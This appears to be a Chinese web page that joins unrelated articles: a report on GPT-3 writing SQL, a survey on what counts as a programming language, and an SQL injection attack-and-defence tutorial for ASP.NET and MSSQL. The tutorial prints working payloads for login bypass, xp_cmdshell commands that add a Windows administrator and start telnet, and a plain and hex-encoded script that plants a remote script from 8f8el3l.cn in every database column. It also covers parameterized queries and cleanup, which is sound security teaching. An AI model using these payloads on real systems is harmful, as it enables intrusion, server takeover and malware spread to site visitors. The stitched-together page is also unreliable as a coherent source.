整合營銷服務商

          電腦端+手機端+微信端=數據同步管理

          免費咨詢熱線:

          解放程序員雙手!GPT-3自動生成SQL語句 - 代

          解放程序員雙手!GPT-3自動生成SQL語句 - 代碼開源

          磊 發自 凹非寺
          量子位 報道 | 公眾號 QbitAI

          “無所不能”的GPT-3,現在又來解放程序員們的雙手了。

          像這樣,只需用簡單的英文問下GPT-3“上個月注冊了多少個用戶”。

          GPT-3便會迅速作答,給出對應的SQL語句

          SELECT COUNT(*) FROM users
          WHERE signup_time > now() - interval ‘
          1 month’


          更神奇的是,GPT-3是在不知道“數據庫模式”的情況下,默認存在“users”這個表;以及在用戶注冊過程中,存在“signup_time”這樣的字段。

          相當的智能了!

          就連開發者本人都連連驚嘆道:妙啊

          更復雜的SQL語句,GPT-3 hold得住嗎?

          當然,剛才提到的提到的例子,只是非常簡單的提問。

          那當GPT-3面對更加復雜的SQL查詢時,還能如此智能嗎?

          為此,作者給它“投喂”了更多的上下文,以及與“數據庫模式”相關的信息:

          輸入一個問題,GPT-3需要回答正確的PostgreSQL

          數據庫包含2個表,分別是“users”和“charges”。

          “users”表包含的字段有:id (integer), signup_dt (timestamp), email (character varying)和 plan_type (character varying)。

          “charges”表包含的字段有:amount (bigint), user_id (integer), 以及charge_dt (timestamp)。

          OK,信息“投喂”完畢,現在來看下GPT-3的表現。

          輸入

          how much revenue did we have in the past 7 days?

          GPT-3

          SELECT SUM(amount) FROM charges WHERE chargedt > now() - interval7 days


          不難看出,GPT-3正確地推斷出了”amount”=“revenue”,并且知道為了回答問題,要用SUM()來匯總過去7天的費用。

          看來GPT-3已經掌握了基本的SQL語法

          但作者也表示,GPT-3有的時候喜歡自己“發明”一些字段,所以現在就用“例子引發”的方式,讓它變得更加智能。

          先讓GPT-3做些簡單的例子實驗,例如讓它從“users”和“charges”2個表中,提取所有可用的字段。

          基于這樣的引導之后,再向GPT-3提問:

          what was the largest payment amount made in the past 30 days?

          GPT-3回答道:

          SELECT MAX(amount) FROM charges WHERE charge_dt > NOW() - INTERVAL30 days

          這個小實驗的結果看著還是挺不錯的,但當作者加大難度后,問題還是出現了

          作者提出了更加復雜的問題:

          when did user with email brian@seekwell.io make his last payment?

          這次GPT-3的回答是:

          SELECT MAX(charge_dt) FROM charges WHERE user_id=1 AND email=‘brian@seekwell.io’

          很明顯,在“charges”表中,并沒有“email”這樣的字段,而是存在于“users”表中。

          也就是說,對于SQL經常用到的聯合查詢,GPT-3還沒有get到。

          讓GPT-3一步步學會“聯合查詢”

          于是,作者還是通過“例子”的方式,一步一步讓它“學”會聯合查詢。

          輸入:how many users signed up in the past 30 days?

          GPT-3:

          SELECT COUNT(*) FROM users WHERE signup_dt >=now() - interval30 days

          輸入:when did user with email brian@seekwell.io sign up?

          GPT-3:

          SELECT signup_dt FROM users WHERE email=‘brian@seekwell.io’

          輸入:how much revenue did we have in the past 7 days?

          GPT-3:

          SELECT SUM(amount) from charges WHERE charge_dt >=now() - interval7 days

          輸入:how much revenue did we have from 10-01-20 through 11-15-20?

          GPT-3:

          SELECT SUM(case when charge_dt>=‘10-01-20’::date and charge_dt < ‘11-15-20’::date then amount else 0 end) as revenue
          FROM charges

          輸入:how much revenue have we had from users that signed up in the last 6 months?

          GPT-3:

          SELECT SUM(charges.amount) FROM users INNER JOIN
          charges
          ON users.id=charges.user_id
          WHERE users.signup_dt>=now() - interval6 months

          輸入:when did user with email brian@seekwell.io make his first payment?

          GPT-3:

          SELECT MIN(charge_dt) as last_payment_dt from users INNER JOIN
          charges
          ON users.id=charges.user_id
          WHERE users.email=‘brian@seekwell.io’

          輸入:how many new users signed up in each of the last 2 months?

          GPT-3:

          SELECT sum(case when signup_dt>=now() - interval1 monththen 1 else 0 end) as signups_this_month,
          sum(case when signup_dt>=now() - interval2 monthsand signup_dt < now() - interval1 monththen 1 else 0 end) as signups_last_month
          FROM users

          在經過這樣一番“學習”之后,回過頭來,再去問GPT-3剛剛出錯的問題:

          how many payments has user with email joe@freshpizza.com made?

          這次它的回答是:

          SELECT COUNT(*) FROM users INNER JOIN charges ON users.id=charges.user_id WHERE users.email=‘joe@freshpizza.com’

          瞧瞧!GPT-3學會“內聯”了,很酷有木有!

          當然,除了用“例子”的方式讓GPT-3變得更加聰明外,作者表示還可以通過調參的方式。

          同時作者還強調了一點,他發現,起碼在“讓GPT-3寫SQL語句”這件事上,GPT-3 Instruct 要比泛化(generalized)的GPT-3引擎好用得多。

          為什么要搞這個項目?

          這個項目的作者是一位分析師,目前就職于一家叫做SeekWell的公司。

          他每天日常的工作,就是編寫大量的SQL語句,來回答與業務相關的問題。

          這就讓他萌生了“自動化”的想法。

          與此同時,他也注意網友們用大火的GPT-3,做了各種各樣有創意的項目。

          例如自動生成HTML、CSS代碼等等,于是他便操刀開始訓練GPT-3生成SQL語句。

          當然,效果也是讓他震驚不已,在博客中也是連連發出“Cool”的聲音。

          ……

          最后,作者將這個項目的代碼在GitHub中開源了,感興趣的讀者可戳下方鏈接。

          參考鏈接:
          https://blog.seekwell.io/gpt3

          GitHub項目地址:
          https://github.com/bkane1/gpt3-instruct-sandbox

          — 完 —

          量子位 QbitAI · 頭條號簽約

          關注我們,第一時間獲知前沿科技動態

          什么是編程語言?"我總會問自己這個問題,SQL是嗎?Excel是嗎?HTML是嗎?……這些問題總在困擾著我,所以我把這些疑問整理成問卷的形式,向各位網友征集了大家的想法。

          上圖就是我們這次調研結果,這次調查我們一共設置了三個選項:是、否和棄權,調查對象主要有HackNews和Reddit的讀者組成。

          正如我們所預期的那樣,絕大多數人都認同C、Java和JavaScript是編程語言,而其他選項的調查結果就有趣了很多:

          Verilog:大多數人同意Verilog(硬件描述語言)是一種編程語言,他們認為即使軟件的輸出是硬件,但生成硬件的過程仍然是程序化的。

          SQL:大多數人認為SQL是一個編程語言,但是很多人因為其缺乏完整性而提出了異議,SQL雖然沒有類和循環,但其仍然有算術表達式、函數和變量。

          C preprocessor:被調查者對于C preprocessor的興趣明顯要高于正則表達式,C preprocessor本質上是一個字符串替換引擎,它比正則表達式的功能更少,只用于生成C代碼。但是,很多人認為是否被用來生成代碼是判斷是否為編程語言的關鍵因素。

          LaTeX:咋一看,這是最接近編程語言的,LaTeX具有變量,函數和許多其他類PL功能(LaTeX是Turing-complete!),但是由于它的輸出是一個文檔,所以我并不看好大家會把它當做是一種編程語言。

          但是令人驚訝的是,它就排在C preprocessor之后。

          CSS:進入Web語言時代之后,少數的受訪者也把CSS當做是一種編程語言。

          TensorFlow:TensorFlow是一種具有變量、循環、編譯器等的數據流語言。然而,因為它是一種特定于領域的語言,而且沒有獨立的語法(它通常通過Python API編程),大多數被調查者并不認為它是一種編程語言。

          HTML:可能和CSS的情況一樣。

          JSON: JSON是一種數據規范語言,但是大多數人并不把它當做是編程語言。

          Microsoft Word: GUIs不可能是編程語言!

          Eclipse:看結果,很顯然并不是!

          對于上述列舉的大家是否認為其屬于編程語言呢?歡迎在下方留言評論!

          業開始從事winform到今年轉到 web ,在碼農屆已經足足混了快接近3年了,但是對安全方面的知識依舊薄弱,事實上是沒機會接觸相關開發……必須的各種借口。這幾天把sql注入的相關知識整理了下,希望大家多多提意見。

          (對于sql注入的攻防,我只用過簡單拼接字符串的注入及參數化查詢,可以說沒什么好經驗,為避免后知后覺地犯下大錯,專門查看大量前輩們的心得,這方面的資料頗多,將其精簡出自己覺得重要的,就成了該文)


          下面的程序方案是采用 ASP.NET + MSSQL,其他技術在設置上會有少許不同。

          示例程序下載:SQL注入攻防入門詳解_示例


          什么是SQL注入(SQL Injection)

          所謂SQL注入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL注入式攻擊。


          嘗嘗SQL注入

          1. 一個簡單的登錄頁面

          關鍵代碼:(詳細見下載的示例代碼)


          private bool NoProtectLogin(string userName, string password)

          {

          int count=(int)SqlHelper.Instance.ExecuteScalar(string.Format

          ("SELECT COUNT(*) FROM Login WHERE UserName='{0}' AND Password='{1}'", userName, password));

          return count > 0 ? true : false;

          }


          方法中userName和 password 是沒有經過任何處理,直接拿前端傳入的數據,這樣拼接的SQL會存在注入漏洞。(賬戶:admin 123456)


          1) 輸入正常數據,效果如圖:

          合并的SQL為:

          SELECT COUNT(*) FROM Login WHERE UserName='admin' AND Password='123456'


          2) 輸入注入數據:

          如圖,即用戶名為:用戶名:admin’—,密碼可隨便輸入

          合并的SQL為:

          SELECT COUNT(*) FROM Login WHERE UserName='admin'-- Password='123'

          因為UserName值中輸入了“--”注釋符,后面語句被省略而登錄成功。(常常的手法:前面加上'; ' (分號,用于結束前一條語句),后邊加上'--' (用于注釋后邊的語句))


          2. 上面是最簡單的一種SQL注入,常見的注入語句還有:

          1) 猜測數據庫名,備份數據庫

          a) 猜測數據庫名: and db_name() >0 或系統表master.dbo.sysdatabases

          b) 備份數據庫:;backup database 數據庫名 to disk=‘c:\*.db’;--

          或:declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';--

          2) 猜解字段名稱

          a) 拆解法:and (select count(字段名) from 表名)>0 若“字段名”存在,則返回正常

          b) 讀取法:and (select top 1 col_name(object_id('表名'),1) from sysobjects)>0 把col_name(object_id('表名'),1)中的1依次換成2,3,4,5,6…就可以得到所有的字段名稱。

          3) 遍歷系統的目錄結構,分析結構并發現WEB虛擬目錄(服務器上傳木馬)

          先創建一個臨時表:;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

          a) 利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中

          ;insert temp exec master.dbo.xp_availablemedia;--

          b) 利用xp_subdirs獲得子目錄列表,并存入temp表中

          ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

          c) 利用xp_dirtree可以獲得“所有”子目錄的目錄樹結構,并存入temp表中

          ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (實驗成功)

          d) 利用 bcp 命令將表內容導成文件

          即插入木馬文本,然后導出存為文件。比如導出為asp文件,然后通過瀏覽器訪問該文件并執行惡意腳本。(使用該命令必須啟動’ xp_cmdshell’)

          Exec master..xp_cmdshell N'BCP "select * from SchoolMarket.dbo.GoodsStoreData;" queryout c:/inetpub/wwwroot/runcommand.asp -w -S"localhost" -U"sa" -P"123"'

          (注意:語句中使用的是雙引號,另外表名格式為“數據庫名.用戶名.表名”)

          在sql查詢器中通過語句:Exec master..xp_cmdshell N'BCP’即可查看BCP相關參數,如圖:

          4) 查詢當前用戶的數據庫權限

          MSSQL中一共存在8種權限:sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin, bulkadmin。

          可通過1=(select IS_SRVROLEMEMBER('sysadmin'))得到當前用戶是否具有該權限。

          5) 設置新的數據庫帳戶(得到MSSQL管理員賬戶)

          d) 在數據庫內添加一個hax用戶,默認密碼是空的

          ;exec sp_addlogin'hax';--

          e) 給hax設置密碼 (null是舊密碼,password是新密碼,user是用戶名)

          ;exec master.dbo.sp_password null,password,username;--

          f) 將hax添加到sysadmin組

          ;exec master.dbo.sp_addsrvrolemember 'hax' ,'sysadmin';--

          6) xp_cmdshell MSSQL存儲過程(得到 WINDOWS管理員賬戶 )

          通過(5)獲取到sysadmin權限的帳戶后,使用查詢分析器連接到數據庫,可通過xp_cmdshell運行系統命令行(必須是sysadmin權限),即使用 cmd.exe 工具,可以做什么自己多了解下。

          下面我們使用xp_cmdshell來創建一個 Windows 用戶,并開啟遠程登錄服務:

          a) 判斷xp_cmdshell擴展存儲過程是否存在

          SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'

          b) 恢復xp_cmdshell擴展存儲過程

          Exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';

          開啟后使用xp_cmdshell還會報下面錯誤:

          SQL Server 阻止了對組件 'xp_cmdshell' 的過程 'sys.xp_cmdshell' 的訪問,因為此組件已作為此服務器安全配置的一部分而被關閉。系統管理員可以通過使用sp_configure啟用 'xp_cmdshell'。有關啟用'xp_cmdshell' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。

          通過執行下面的語句進行設置:

          -- 允許配置高級選項

          EXEC sp_configure 'show advanced options', 1

          GO

          -- 重新配置

          RECONFIGURE

          GO

          -- 啟用xp_cmdshell

          EXEC sp_configure 'xp_cmdshell', 0

          GO

          --重新配置

          RECONFIGURE

          GO

          c) 禁用xp_cmdshell擴展存儲過程

          Exec master.dbo.sp_dropextendedproc 'xp_cmdshell';

          d) 添加windows用戶:

          Exec xp_cmdshell 'net user awen /add';

          e) 設置好密碼:

          Exec xp_cmdshell 'net user awen password';

          f) 提升到管理人員:

          Exec xp_cmdshell 'net localgroup administrators awen /add';

          g) 開啟telnet服務:

          Exec xp_cmdshell 'net start tlntsvr'

          7) 沒有xp_cmdshell擴展程序,也可創建Windows帳戶的辦法.

          (本人windows7系統,測試下面SQL語句木有效果)

          declare @shell int ;

          execsp_OAcreate 'w script .shell',@shell output ;

          execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen /add';

          execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen 123';

          execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net localgroup administrators awen /add';

          在使用的時候會報如下錯:

          SQL Server 阻止了對組件 'Ole Automation Procedures' 的過程 'sys.sp_OACreate'、'sys.sp_OAMethod' 的訪問,因為此組件已作為此服務器安全配置的一部分而被關閉。系統管理員可以通過使用sp_configure啟用 'Ole Automation Procedures'。有關啟用 'Ole Automation Procedures' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。

          解決辦法:

          sp_configure 'show advanced options', 1;

          GO

          RECONFIGURE;

          GO

          sp_configure 'Ole Automation Procedures', 1;

          GO

          RECONFIGURE;

          GO

          好了,這樣別人可以登錄你的服務器了,你怎么看?

          8) 客戶端腳本攻擊

          攻擊1:(正常輸入)攻擊者通過正常的輸入提交方式將惡意腳本提交到數據庫中,當其他用戶瀏覽此內容時就會受到惡意腳本的攻擊。

          措施:轉義提交的內容,.NET 中可通過System.Net.WebUtility.HtmlEncode(string) 方法將字符串轉換為HTML編碼的字符串。


          攻擊2:(SQL注入)攻擊者通過SQL注入方式將惡意腳本提交到數據庫中,直接使用SQL語法UPDATE數據庫,為了跳過System.Net.WebUtility.HtmlEncode(string) 轉義,攻擊者會將注入SQL經過“HEX編碼”,然后通過exec可以執行“動態”SQL的特性運行腳本”。

          參考:

          注入:SQL注入案例曝光,請大家提高警惕

          恢復:批量清除數據庫中被植入的js

          示例代碼:(可在示例附帶的數據庫測試)

          a) 向當前數據庫的每個表的每個字段插入一段惡意腳本


          1

          2

          3

          4

          5

          6

          7

          8

          9

          10

          11

          12

          13

          Declare @T Varchar(255),@C Varchar(255)

          Declare Table_Cursor Cursor For

          Select A.Name,B.Name

          From SysobjectsA,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

          Open Table_Cursor

          Fetch Next From Table_Cursor Into @T,@C

          While(@@Fetch_Status=0)

          Begin

          Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://8f8el3l.cn/0.js></script>''')

          Fetch Next From Table_Cursor Into @T,@C

          End

          Close Table_Cursor

          DeallocateTable_Cursor


          b) 更高級的攻擊,將上面的注入SQL進行“HEX編碼”,從而避免程序的關鍵字檢查、腳本轉義等,通過EXEC執行


          dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72;

          eXeC(@s);--


          c) 批次刪除數據庫被注入的腳本


          declare @delStrnvarchar(500)

          set @delStr='<script src=http://8f8el3l.cn/0.js></script>' --要被替換掉字符

          setnocount on

          declare @tableNamenvarchar(100),@columnNamenvarchar(100),@tbIDint,@iRowint,@iResultint

          declare @sqlnvarchar(500)

          set @iResult=0

          declare cur cursor for

          selectname,id from sysobjects where xtype='U'

          open cur

          fetch next from cur into @tableName,@tbID

          while @@fetch_status=0

          begin

          declare cur1 cursor for

          --xtype in (231,167,239,175) 為char,varchar,nchar,nvarchar類型

          select name from syscolumns where xtype in (231,167,239,175) and id=@tbID

          open cur1

          fetch next from cur1 into @columnName

          while @@fetch_status=0

          begin

          set @sql='update [' + @tableName + '] set ['+ @columnName +']=replace(['+@columnName+'],'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''

          execsp_executesql @sql

          set @iRow=@@rowcount

          set @iResult=@iResult+@iRow

          if @iRow>0

          begin

          print '表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'條記錄;'

          end

          fetch next from cur1 into @columnName

          end

          close cur1

          deallocate cur1

          fetch next from cur into @tableName,@tbID

          end

          print '數據庫共有'+convert(varchar(10),@iResult)+'條記錄被更新!!!'

          close cur

          deallocate cur

          setnocount off


          d) 我如何得到“HEX編碼”?

          開始不知道HEX是什么東西,后面查了是“十六進制”,網上已經給出兩種轉換方式:(注意轉換的時候不要加入十六進制的標示符 ’0x’ )

          ? 在線轉換 (TRANSLATOR, BINARY),進入……

          ? C#版的轉換,進入……

          9) 對于敏感詞過濾不到位的檢查,我們可以結合函數構造SQL注入

          比如過濾了update,卻沒有過濾declare、exec等關鍵詞,我們可以使用reverse來將倒序的sql進行注入:


          declare @A varchar(200);set @A=reverse('''58803303431''=emanresu erehw ''9d4d9c1ac9814f08''=drowssaP tes xxx tadpu');


          防止SQL注入

          1. 數據庫權限控制,只給訪問數據庫的web應用功能所需的最低權限帳戶。

          如MSSQL中一共存在8種權限:sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin, bulkadmin。

          2. 自定義錯誤信息,首先我們要屏蔽服務器的詳細錯誤信息傳到客戶端。

          在 ASP.NET 中,可通過web.config配置文件的<customErrors>節點設置:


          <customErrors defaultRedirect="url" mode="On|Off|RemoteOnly">

          <error. . ./>

          </customErrors>


          更詳細,請進入……

          mode:指定是啟用或禁用自定義錯誤,還是僅向遠程客戶端顯示自定義錯誤。


          On

          指定啟用自定義錯誤。如果未指定defaultRedirect,用戶將看到一般性錯誤。


          Off

          指定禁用自定義錯誤。這允許顯示標準的詳細錯誤。


          RemoteOnly

          指定僅向遠程客戶端顯示自定義錯誤并且向本地主機顯示ASP.NET 錯誤。這是默認值。


          看下效果圖:

          設置為<customErrors mode="On">一般性錯誤:


          設置為<customErrors mode="Off">:


          3. 把危險的和不必要的存儲過程刪除

          xp_:擴展存儲過程的前綴,SQL注入攻擊得手之后,攻擊者往往會通過執行xp_cmdshell之類的擴展存儲過程,獲取系統信息,甚至控制、破壞系統。


          xp_cmdshell

          能執行dos命令,通過語句sp_dropextendedproc刪除,

          不過依然可以通過sp_addextendedproc來恢復,因此最好刪除或改名xplog70.dll(sql server 2000、windows7)

          xpsql70.dll(sqlserer 7.0)


          xp_fileexist

          用來確定一個文件是否存在


          xp_getfiledetails

          可以獲得文件詳細資料


          xp_dirtree

          可以展開你需要了解的目錄,獲得所有目錄深度


          Xp_getnetname

          可以獲得服務器名稱


          Xp_regaddmultistring

          Xp_regdeletekey

          Xp_regdeletevalue

          Xp_regenumvalues

          Xp_regread

          Xp_regremovemultistring

          Xp_regwrite

          可以訪問注冊表的存儲過程


          Sp_OACreate

          Sp_OADestroy

          Sp_OAGetErrorInfo

          Sp_OAGetProperty

          Sp_OAMethod

          Sp_OASetProperty

          Sp_OAStop

          如果你不需要請丟棄OLE自動存儲過程


          4. 非參數化SQL與參數化SQL

          1) 非參數化(動態拼接SQL)

          a) 檢查客戶端腳本:若使用.net,直接用System.Net.WebUtility.HtmlEncode(string)將輸入值中包含的《HTML特殊轉義字符》轉換掉。

          b) 類型檢查:對接收數據有明確要求的,在方法內進行類型驗證。如數值型用int.TryParse(),日期型用DateTime.TryParse() ,只能用英文或數字等。

          c) 長度驗證:要進行必要的注入,其語句也是有長度的。所以如果你原本只允許輸入10字符,那么嚴格控制10個字符長度,一些注入語句就沒辦法進行。

          d) 使用枚舉:如果只有有限的幾個值,就用枚舉。

          e) 關鍵字過濾:這個門檻比較高,因為各個數據庫存在關鍵字,內置函數的差異,所以對編寫此函數的功底要求較高。如公司或個人有積累一個比較好的通用過濾函數還請留言分享下,學習學習,謝謝!

          這邊提供一個關鍵字過濾參考方案(MSSQL):


          public static bool ValiParms(string parms)

          {

          if (parms==null)

          {

          return false;

          }

          Regex regex=new Regex("sp_", RegexOptions.IgnoreCase);

          Regex regex2=new Regex("'", RegexOptions.IgnoreCase);

          Regex regex3=new Regex("create ", RegexOptions.IgnoreCase);

          Regex regex4=new Regex("drop ", RegexOptions.IgnoreCase);

          Regex regex5=new Regex("\"", RegexOptions.IgnoreCase);

          Regex regex6=new Regex("exec ", RegexOptions.IgnoreCase);

          Regex regex7=new Regex("xp_", RegexOptions.IgnoreCase);

          Regex regex8=new Regex("insert ", RegexOptions.IgnoreCase);

          Regex regex9=new Regex("delete ", RegexOptions.IgnoreCase);

          Regex regex10=new Regex("select ", RegexOptions.IgnoreCase);

          Regex regex11=new Regex("update ", RegexOptions.IgnoreCase);

          return (regex.IsMatch(parms) || (regex2.IsMatch(parms) || (regex3.IsMatch(parms) || (regex4.IsMatch(parms) || (regex5.IsMatch(parms) || (regex6.IsMatch(parms) || (regex7.IsMatch(parms) || (regex8.IsMatch(parms) || (regex9.IsMatch(parms) || (regex10.IsMatch(parms) || (regex11.IsMatch(parms))))))))))));

          }


          優點:寫法相對簡單,網絡傳輸量相對參數化拼接SQL小

          缺點:

          a) 對于關鍵字過濾,常常“顧此失彼”,如漏掉關鍵字,系統函數,對于HEX編碼的SQL語句沒辦法識別等等,并且需要針對各個數據庫封裝函數。

          b) 無法滿足需求:用戶本來就想發表包含這些過濾字符的數據。

          c) 執行拼接的SQL浪費大量緩存空間來存儲只用一次的查詢計劃。服務器的物理內存有限,SQLServer的緩存空間也有限。有限的空間應該被充分利用。

          2) 參數化查詢(Parameterized Query)

          a) 檢查客戶端腳本,類型檢查,長度驗證,使用枚舉,明確的關鍵字過濾這些操作也是需要的。他們能盡早檢查出數據的有效性。

          b) 參數化查詢原理:在使用參數化查詢的情況下,數據庫服務器不會將參數的內容視為SQL指令的一部份來處理,而是在數據庫完成 SQL 指令的編譯后,才套用參數運行,因此就算參數中含有具有損的指令,也不會被數據庫所運行。

          c) 所以在實際開發中,入口處的安全檢查是必要的,參數化查詢應作為最后一道安全防線。

          優點:

          ? 防止SQL注入(使單引號、分號、注釋符、xp_擴展函數、拼接SQL語句、EXEC、SELECT、UPDATE、DELETE等SQL指令無效化)

          ? 參數化查詢能強制執行類型和長度檢查。

          ? 在MSSQL中生成并重用查詢計劃,從而提高查詢效率(執行一條SQL語句,其生成查詢計劃將消耗大于50%的時間)

          缺點:

          ? 不是所有數據庫都支持參數化查詢。目前Access、SQL Server、MySQL、SQLite、Oracle等常用數據庫支持參數化查詢。


          疑問:參數化如何“批量更新”數據庫。

          a) 通過在參數名上增加一個計數來區分開多個參數化語句拼接中的同名參數。

          EG:



          StringBuilder sqlBuilder=new StringBuilder(512);

          Int count=0;

          For(循環)

          {

          sqlBuilder.AppendFormat(“UPDATE login SET password=@password{0} WHERE username=@userName{0}”,count.ToString());

          SqlParameter para=new SqlParamter(){ParameterName=@password+count.ToString()}

          ……

          Count++;

          }


          b) 通過MSSQL 2008的新特性:表值參數,將C#中的整個表當參數傳遞給存儲過程,由SQL做邏輯處理。注意C#中參數設置parameter.SqlDbType=System.Data.SqlDbType.Structured; 詳細請查看……


          疑慮:有部份的開發人員可能會認為使用參數化查詢,會讓程序更不好維護,或者在實現部份功能上會非常不便,然而,使用參數化查詢造成的額外開發成本,通常都遠低于因為SQL注入攻擊漏洞被發現而遭受攻擊,所造成的重大損失。


          另外:想驗證重用查詢計劃的同學,可以使用下面兩段輔助語法



          --清空緩存的查詢計劃

          DBCC FREEPROCCACHE

          GO

          --查詢緩存的查詢計劃

          SELECT stats.execution_count AS cnt, p.size_in_bytes AS [size], [sql].[text] AS [plan_text]

          FROM sys.dm_exec_cached_plans p

          OUTER APPLY sys.dm_exec_sql_text (p.plan_handle) sql

          JOIN sys.dm_exec_query_stats stats ON stats.plan_handle=p.plan_handle

          GO


          3) 參數化查詢示例

          效果如圖:

          參數化關鍵代碼:



          Private bool ProtectLogin(string userName, string password)

          {

          SqlParameter[] parameters=new SqlParameter[]

          {

          new SqlParameter{ParameterName="@UserName",SqlDbType=SqlDbType.NVarChar,Size=10,Value=userName},

          new SqlParameter{ParameterName="@Password",SqlDbType=SqlDbType.VarChar,Size=20,Value=password}

          };

          int count=(int)SqlHelper.Instance.ExecuteScalar

          ("SELECT COUNT(*) FROM Login WHERE UserName=@UserName AND Password=@password", parameters);

          return count > 0 ? true : false;

          }


          5. 存儲過程

          存儲過程(Stored Procedure)是在大型數據庫系統中,一組為了完成特定功能的SQL 語句集,經編譯后存儲在數據庫中,用戶通過指定存儲過程的名字并給出參數(如果該存儲過程帶有參數)來執行它。

          優點:

          a) 安全性高,防止SQL注入并且可設定只有某些用戶才能使用指定存儲過程。

          b) 在創建時進行預編譯,后續的調用不需再重新編譯。

          c) 可以降低網絡的通信量。存儲過程方案中用傳遞存儲過程名來代替SQL語句。

          缺點:

          a) 非應用程序內聯代碼,調式麻煩。

          b) 修改麻煩,因為要不斷的切換開發工具。(不過也有好的一面,一些易變動的規則做到存儲過程中,如變動就不需要重新編譯應用程序)

          c) 如果在一個程序系統中大量的使用存儲過程,到程序交付使用的時候隨著用戶需求的增加會導致數據結構的變化,接著就是系統的相關問題了,最后如果用戶想維護該系統可以說是很難很難(eg:沒有VS的查詢功能)。

          演示請下載示例程序,關鍵代碼為:


          cmd.CommandText=procName; // 傳遞存儲過程名

          cmd.CommandType=CommandType.StoredProcedure; // 標識解析為存儲過程


          如果在存儲過程中SQL語法很復雜需要根據邏輯進行拼接,這時是否還具有放注入的功能?

          答:MSSQL中可以通過 EXEC 和sp_executesql動態執行拼接的sql語句,但sp_executesql支持替換 Transact-SQL 字符串中指定的任何參數值, EXECUTE 語句不支持。所以只有使用sp_executesql方式才能啟到參數化防止SQL注入。

          關鍵代碼:(詳細見示例)

          a) sp_executesql



          CREATE PROCEDURE PROC_Login_executesql(

          @userNamenvarchar(10),

          @password nvarchar(10),

          @count int OUTPUT

          )

          AS

          BEGIN

          DECLARE @s nvarchar(1000);

          set @s=N'SELECT @count=COUNT(*) FROM Login WHERE UserName=@userName AND Password=@password';

          EXEC sp_executesql @s,N'@userName nvarchar(10),@password nvarchar(10),@count int output',@userName=@userName,@password=@password,@count=@count output

          END


          b) EXECUTE(注意sql中拼接字符,對于字符參數需要額外包一層單引號,需要輸入兩個單引號來標識sql中的一個單引號)



          CREATE PROCEDURE PROC_Login_EXEC(

          @userNamenvarchar(10),

          @password varchar(20)

          )

          AS

          BEGIN

          DECLARE @s nvarchar(1000);

          set @s='SELECT @count=COUNT(*) FROM Login WHERE UserName='''+CAST(@userName AS NVARCHAR(10))+''' AND Password='''+CAST(@password AS VARCHAR(20))+'''';

          EXEC('DECLARE @count int;' +@s+'select @count');

          END


          注入截圖如下:



          6. 專業的SQL注入工具及防毒軟件

          情景1

          A:“丫的,又中毒了……”

          B:“我看看,你這不是裸機在跑嗎?”

          電腦上至少也要裝一款殺毒軟件或木馬掃描軟件,這樣可以避免一些常見的侵入。比如開篇提到的SQL創建windows帳戶,就會立馬報出警報。


          情景2

          A:“終于把網站做好了,太完美了,已經檢查過沒有漏洞了!”

          A:“網站怎么被黑了,怎么入侵的???”

          公司或個人有財力的話還是有必要購買一款專業SQL注入工具來驗證下自己的網站,這些工具畢竟是專業的安全人員研發,在安全領域都有自己的獨到之處。SQL注入工具介紹:10個SQL注入工具


          7. 額外小知識:LIKE中的通配符

          盡管這個不屬于SQL注入,但是其被惡意使用的方式是和SQL注入類似的。

          參考:SQL中通配符的使用


          %

          包含零個或多個字符的任意字符串。


          _

          任何單個字符。


          []

          指定范圍(例如 [a-f])或集合(例如 [abcdef])內的任何單個字符。


          [^]

          不在指定范圍(例如 [^a - f])或集合(例如 [^abcdef])內的任何單個字符。


          在模糊查詢LIKE中,對于輸入數據中的通配符必須轉義,否則會造成客戶想查詢包含這些特殊字符的數據時,這些特殊字符卻被解析為通配符。不與 LIKE 一同使用的通配符將解釋為常量而非模式。

          注意使用通配符的索引性能問題:

          a) like的第一個字符是'%'或'_'時,為未知字符不會使用索引, sql會遍歷全表。

          b) 若通配符放在已知字符后面,會使用索引。

